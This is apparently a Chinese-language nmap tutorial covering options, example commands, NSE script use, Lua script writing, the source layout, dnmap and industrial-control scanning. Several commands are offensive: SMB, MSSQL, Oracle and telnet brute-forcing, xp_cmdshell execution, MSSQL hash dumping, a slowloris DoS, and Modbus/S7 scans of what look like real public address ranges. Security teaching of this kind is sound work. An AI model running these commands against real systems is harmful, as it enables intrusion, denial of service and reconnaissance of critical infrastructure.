简介

nmap是一个网络连接端扫描软件，用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端，并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员和hacker必用的软件之一。

常用参数说明

-iL filename                    从文件中读取待检测的目标,文件中的表示方法支持机名,ip,网段
-iR hostnum                     随机选取,进行扫描.如果-iR指定为0,则是无休止的扫描
--exclude host1[, host2]        从扫描任务中需要排除的主机           
--exculdefile exclude_file      排除文件中的IP,格式和-iL指定扫描文件的格式相同
主机发现
-sL                     仅仅是显示,扫描的IP数目,不会进行任何扫描
-sn                     ping扫描,即主机发现
-Pn                     不检测主机存活
-PS/PA/PU/PY[portlist]  TCP SYN Ping/TCP ACK Ping/UDP Ping发现
-PE/PP/PM               使用ICMP echo, timestamp and netmask 请求包发现主机
-PO[prococol list]      使用IP协议包探测对方主机是否开启   
-n/-R                   不对IP进行域名反向解析/为所有的IP都进行域名的反响解析
扫描技巧
-sS/sT/sA/sW/sM                 TCP SYN/TCP connect()/ACK/TCP窗口扫描/TCP Maimon扫描
-sU                             UDP扫描
-sN/sF/sX                       TCP Null，FIN，and Xmas扫描
--scanflags                     自定义TCP包中的flags
-sI zombie host[:probeport]     Idlescan
-sY/sZ                          SCTP INIT/COOKIE-ECHO 扫描
-sO                             使用IP protocol 扫描确定目标机支持的协议类型
-b “FTP relay host”             使用FTP bounce scan
指定端口和扫描顺序
-p                      特定的端口 -p80,443 或者 -p1-65535
-p U:PORT               扫描udp的某个端口, -p U:53
-F                      快速扫描模式,比默认的扫描端口还少
-r                      不随机扫描端口,默认是随机扫描的
--top-ports "number"    扫描开放概率最高的number个端口,出现的概率需要参考nmap-services文件,ubuntu中该文件位于/usr/share/nmap.nmap默认扫前1000个
--port-ratio "ratio"    扫描指定频率以上的端口
服务版本识别
-sV                             开放版本探测,可以直接使用-A同时打开操作系统探测和版本探测
--version-intensity "level"     设置版本扫描强度,强度水平说明了应该使用哪些探测报文。数值越高，服务越有可能被正确识别。默认是7
--version-light                 打开轻量级模式,为--version-intensity 2的别名
--version-all                   尝试所有探测,为--version-intensity 9的别名
--version-trace                 显示出详细的版本侦测过程信息
脚本扫描
-sC                             根据端口识别的服务,调用默认脚本
--script=”Lua scripts”          调用的脚本名
--script-args=n1=v1,[n2=v2]     调用的脚本传递的参数
--script-args-file=filename     使用文本传递参数
--script-trace                  显示所有发送和接收到的数据
--script-updatedb               更新脚本的数据库
--script-help=”Lua script”      显示指定脚本的帮助
OS识别
-O              启用操作系统检测,-A来同时启用操作系统检测和版本检测
--osscan-limit  针对指定的目标进行操作系统检测(至少需确知该主机分别有一个open和closed的端口)
--osscan-guess  推测操作系统检测结果,当Nmap无法确定所检测的操作系统时，会尽可能地提供最相近的匹配，Nmap默认进行这种匹配
防火墙/IDS躲避和哄骗
-f; --mtu value                 指定使用分片、指定数据包的MTU.
-D decoy1,decoy2,ME             使用诱饵隐蔽扫描
-S IP-ADDRESS                   源地址欺骗
-e interface                    使用指定的接口
-g/ --source-port PROTNUM       使用指定源端口  
--proxies url1,[url2],...       使用HTTP或者SOCKS4的代理 

--data-length NUM               填充随机数据让数据包长度达到NUM
--ip-options OPTIONS            使用指定的IP选项来发送数据包
--ttl VALUE                     设置IP time-to-live域
--spoof-mac ADDR/PREFIX/VEBDOR  MAC地址伪装
--badsum                        使用错误的checksum来发送数据包
Nmap 输出
-oN                     将标准输出直接写入指定的文件
-oX                     输出xml文件
-oS                     将所有的输出都改为大写
-oG                     输出便于通过bash或者perl处理的格式,非xml
-oA BASENAME            可将扫描结果以标准格式、XML格式和Grep格式一次性输出
-v                      提高输出信息的详细度
-d level                设置debug级别,最高是9
--reason                显示端口处于带确认状态的原因
--open                  只输出端口状态为open的端口
--packet-trace          显示所有发送或者接收到的数据包
--iflist                显示路由信息和接口,便于调试
--log-errors            把日志等级为errors/warings的日志输出
--append-output         追加到指定的文件
--resume FILENAME       恢复已停止的扫描
--stylesheet PATH/URL   设置XSL样式表，转换XML输出
--webxml                从namp.org得到XML的样式
--no-sytlesheet         忽略XML声明的XSL样式表
其他nmap选项
-6                      开启IPv6
-A                      OS识别,版本探测,脚本扫描和traceroute
--datedir DIRNAME       说明用户Nmap数据文件位置
--send-eth / --send-ip  使用原以太网帧发送/在原IP层发送
--privileged            假定用户具有全部权限
--unprovoleged          假定用户不具有全部权限,创建原始套接字需要root权限
-V                      打印版本信息
-h                      输出帮助

用例

扫描网段 (192.168.1.0/24)

nmap -sP 192.168.1.0/24 或者 nmap -sP 192.168.1.*

SYN对全端口进行扫描

在aggressive(4)的时间模板下,同时对开放的端口进行端口识别，并查看相应的服务器版本。

nmap -sS -T4 -p1-65535 -sV 192.168.1.169

在aggressive(4)的时间模板下，探测操作系统的类型和版本，并显示traceroute的结果。

nmap -sS -T4 -A 192.168.1.169

nmap -sS -T4 -A -O 192.168.1.169

文件中读取需要扫描的IP列表

nmap -iL ips.txt

扫描的结果输出处理

将扫描的结果输出到屏幕，同时存储一份到output.txt。

nmap -sS -p1-65525 192.168.1.169 -oG output.txt

扫描结果输出为html。

nmap -sS -p1-65525 192.168.1.169 --webxml -oX - | xsltproc --output  file.html

在子网中发现开放netbios的IP

nmap -sV -v -p139,445 192.168.1.0/24

扫描指定netbios的名称

nmap -sU --script nbstat.nse -p 137 target

扫描指定的目标,同时检测相关漏洞

nmap --script-args=unsafe=1 --script smb-check-vulns.nse -p 445 169

nmap脚本使用

常用脚本说明

auth: 负责处理鉴权证书（绕开鉴权）的脚本  
broadcast: 在局域网内探查更多服务开启状况，如dhcp/dns/sqlserver等服务  
brute: 提供暴力破解方式，针对常见的应用如http/snmp等  
default: 使用-sC或-A选项扫描时候默认的脚本，提供基本脚本扫描能力  
discovery: 对网络进行更多的信息，如SMB枚举、SNMP查询等  
dos: 用于进行拒绝服务攻击  
exploit: 利用已知的漏洞入侵系统  
external: 利用第三方的数据库或资源，例如进行whois解析  
fuzzer: 模糊测试的脚本，发送异常的包到目标机，探测出潜在漏洞 intrusive: 入侵性的脚本，此类脚本可能引发对方的IDS/IPS的记录或屏蔽  
malware: 探测目标机是否感染了病毒、开启了后门等信息  
safe: 此类与intrusive相反，属于安全性脚本  
version: 负责增强服务与版本扫描（Version Detection）功能的脚本  
vuln: 负责检查目标机是否有常见的漏洞（Vulnerability），如是否有MS08_067

负责处理鉴权证书（绕开鉴权）的脚本,也可以作为检测部分应用弱口令

nmap --script=auth 192.168.1.*

提供暴力破解的方式 可对数据库，smb，snmp等进行简单密码的暴力猜解

nmap --script=brute 192.168.1.169

默认的脚本扫描，主要是搜集各种应用服务的信息，收集到后，可再针对具体服务进行攻击

nmap --script=default 192.168.1.169 或者 nmap -sC 192.168.1.169

检查是否存在常见漏洞

nmap --script=vuln 192.168.1.169

在局域网内探查更多服务开启状况

nmap -n -p445 --script=broadcast 192.168.1.169

利用第三方的数据库或资源，例如进行whois解析

nmap --script external 192.168.1.169

vnc扫描

nmap --script=realvnc-auth-bypass 192.168.1.169

获取vnc信息

nmap --script=vnc-info 192.168.1.169

smb扫描

说明:SMB协议是基于TCP－NETBIOS下的，一般端口使用为139，445。

nmap --script=smb-brute.nse 192.168.1.169

• smb字典破解

nmap --script=smb-brute.nse --script-args=userdb=/var/passwd,passdb=/var/passwd 192.168.1.169

• smb已知几个严重漏扫描

nmap  --script=smb-check-vulns.nse --script-args=unsafe=1 192.168.1.169

• smb查看共享目录

nmap -p 445  --script smb-ls --script-args 'share=c$,path=\test,smbuser=administrator,smbpass=fuckyou' 192.168.1.169

• smb查询主机一些敏感信息

nmap -p 445 -n –script=smb-psexec --script-args 'smbuser=administrator,smbpass=fuckyou' 192.168.1.169

• smb查看会话

nmap -p 445 -n --script=smb-enum-sessions  --script-args 'smbuser=administrator,smbpass=fuckyou' 192.168.1.169

• smb系统信息

nmap -p 445 -n --script=smb-os-discovery  --script-args 'smbuser=administrator,smbpass=fuckyou' 192.168.1.169

猜解mssql用户名和密码

nmap -p1433 --script=ms-sql-brute --script-args=userdb=/var/passwd,passdb=/var/passwd 192.168.1.169

xp_cmdshell 执行命令

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="net user" 192.168.1.169

dumphash值

nmap -p 1433 --script ms-sql-dump-hashes --script-args mssql.username=sa,mssql.password=sa 192.168.1.169

扫描root空口令

nmap -p3306 --script=mysql-empty-password 192.168.1.169

列出所有MySQL用户

nmap -p3306 --script=mysql-users --script-args=mysqluser=root 192.168.1.169

支持同一应用的所有脚本扫描

nmap --script=mysql-* 192.168.1.169

Oracle sid扫描

nmap --script=oracle-sid-brute -p 1521-1560 192.168.1.5

oracle弱口令破解

nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL,userdb=/var/passwd,passdb=/var/passwd 192.168.1.5

其他一些比较好用的脚本

nmap --script=broadcast-netbios-master-browser 192.168.137.4   发现网关  
nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' 192.168.137.4  破解rsync  
nmap --script informix-brute -p 9088 192.168.137.4    informix数据库破解  
nmap -p 5432 --script pgsql-brute 192.168.137.4       pgsql破解  
nmap -sU --script snmp-brute 192.168.137.4            snmp破解  
nmap -sV --script=telnet-brute 192.168.137.4          telnet破解  
nmap --script=http-vuln-cve2010-0738 --script-args 'http-vuln-cve2010-0738.paths={/path1/,/path2/}' <target>  jboss autopwn  
nmap --script=http-methods.nse 192.168.137.4 检查http方法  
nmap --script http-slowloris --max-parallelism 400 192.168.137.4  dos攻击，对于处理能力较小的站点还挺好用的 'half-HTTP' connections   
nmap --script=samba-vuln-cve-2012-1182  -p 139 192.168.137.4

nmap脚本编写

需要使用Lua脚本语言编写。
基于传统的语言标准，我们写一个脚本，作用:遇到开放的HTTP端口，就返回”Hello World”。
代码如下：

-- The Head Section -- 
-- The Rule Section -- 
portrule = function(host, port) 
    return port.protocol == "tcp" and port.number == 80 and port.state == "open" 
end 

-- The Action Section -- 
action = function(host, port) 
    return "Hello world !" 
end 
注意:以--起始的行表示注释。

NSE脚本主要由三部分组成:

The Head Section

该部分包含一些元数据，主要描述脚本的功能，作者，影响力，类别及其他。

The Rule Section

该部分定义脚本执行的必要条件。至少包含下面列表中的一个函数:
portrule
hostrule
prerule
postrule
此案例中，重点介绍portrule。portrule能够在执行操作前，检查host和port属性。portrule会利用nmap的API检查TCP80端口。

The Action Section

该部分定义脚本逻辑。此处案例中，检测到开放80端口，则打印“HelloWorld”。脚本的输出内容，会在nmap执行期间显示出来。

nmap -sS -p 22,80,443 --script ./http-vuln-check.nse 192.168.1.169

详情参考：

https://nmap.org/book/nse/api.html%20

http://blog.csdn.net/nixawk/article/details/39701019

python-nmap使用

pip install python-nmap

文档: http://xael.org/pages/python-nmap-en.html

libnmap使用

文档: https://libnmap.readthedocs.org/en/latest/

实例参考: http://www.freebuf.com/tools/32092.html

nmap源码分析

结构如下：

Nmap/
├─docs（Nmap相关文档，包括License、usage说明及XMLschema文件等）
│  ├─licenses   
│  └─man-xlate
├─libdnet-stripped（libdnet：简单的网络接口开源库）
│  ├─config
│  ├─include
│  └─src
├─liblinear（LIBLINEAR：负责大型线性分类的开源库）
│  └─blas
├─liblua（Lua脚本语言源码库）
├─libnetutil（Nmap实现的基本的网络实用函数）
├─libpcap（开源的抓包代码库libpcap）
│  ├─bpf
│  ├─ChmodBPF
│  ├─lbl
│  ├─missing
│  ├─msdos
│  ├─NMAP_MODIFICATIONS
│  ├─packaging
│  ├─pcap
│  ├─SUNOS4
│  ├─tests
│  └─Win32
├─libpcre（Perl兼容的正则表达式开源库libpcre）
├─macosx（该目录负责支持苹果的操作系统MACOS X）
│  └─nmap.pmdoc
├─mswin32（该目录负责支持Windows操作系统）
│  ├─lib
│  ├─license-format
│  ├─NET
│  ├─NETINET
│  ├─nsis
│  ├─OpenSSL
│  ├─pcap-include
│  ├─RPC
│  └─winpcap
├─nbase（Nmap封装的基础使用程序库，包括string/path/random等）
├─ncat（Ncat是Nmap项目组实现的新版的netcat：强大的网络工具）
│  ├─certs
│  ├─docs
│  └─test
├─ndiff（Ndiff是用于比较Nmap扫描结果的实用命令）
│  ├─docs
│  └─test-scans
├─nmap-update（负责Nmap更新相关操作）
├─nping（Nping是Nmap项目组实现的新版的Hping：网络探测与构建packet）
│  └─docs
├─nselib（Nmap使用Lua语言编写的常用的脚本库）
│  └─data
├─nsock（Nmap实现的并行的SocketEvent处理库）
│  ├─include
│  └─src
├─scripts（Nmap提供常用的扫描检查的lua脚本）
├─todo（介绍Nmap项目将来开发的具体任务）
└─zenmap（Nmap的官方的图形界面程序，由python语言编写）
   ├─install_scripts
   ├─radialnet
   ├─share
   ├─test
   ├─zenmapCore
   └─zenmapGUI

nmap6.0工程内总共包括1300多个文件。

C和C++文件有600多个，主要实现Nmap最核心的功能：主机发现、端口扫描、服务侦测、OS侦测及搭建脚本引擎框架；也包括其他开源项目如libpcap的源码。

Python文件有100多个，主要实现Zenmap图形界面，Zenmap会调用到Nmap基本命令，也实现一些新的功能：例如确定网络拓扑结构、Profile的管理（常用的命令保存为Profile）等。

Lua与NSE文件400多个，负责构建Nmap脚本引擎及提供常用的扫描脚本。其中NSE格式为Nmap定制的Lua文件，方便用户自行编写脚本进行功能扩展。

XML文件数十个，用于辅助描述Nmap的内容或Zenmap的测试等工作。

其他文件，其他辅助工具操作的文件。

执行流程:

nmap分布式版本- dnmap

dnmap_server的用法

dnmap_server -h
新建一个nmap 命令文件command.txt
提交作业给服务器机子：
dnmap_server -f ./command.txt

服务端启动之后，就开始等待客户端链接。

dnmap_client的用法

dnmap_client -h
连接到服务器地址，端口号及客户端的命名
dnmap_client -s 192.168.1.152 -a 'salve01'
默认情况下扫描结果都被存储在名为 "nmap_result/." 目录下。

参考: http://www.mateslab.com.ar/dnmap-the-distributed-nmap.html

nmap工控分析

工控分析也利用搜索引擎：shodan/zoomeye；下面主要介绍nmap常用的脚本。

• Ethernet/IP 44818

nmap -p 44818 --script enip-enumerate.nse 85.132.179.*

• Modbus 502

nmap --script modicon-info.nse -Pn -p 502 -sV 91.83.43.*

• IEC 61870-5-101/104 2404

nmap -Pn -n -d --script iec-identify.nse --script-args=iec-identify -p 2404 80.34.253.*

• Siemens S7 102

nmap -p 102 --script s7-enumerate -sV 140.207.152.*
nmap -d --script mms-identify.nse --script-args='mms-identify.timeout=500' -p 102 IP

• Tridium Niagara Fox 1911

nmap -p 1911 --script fox-info 99.55.238.*

常见脚本资源

github

https://github.com/atimorin/scada-tools

https://github.com/atimorin/PoC2013

https://github.com/drainware/scada-tools

https://github.com/drainware/nmap-scada

exploit-db

https://www.exploit-db.com/exploits/19833/

https://www.exploit-db.com/exploits/19832/

https://www.exploit-db.com/exploits/19831/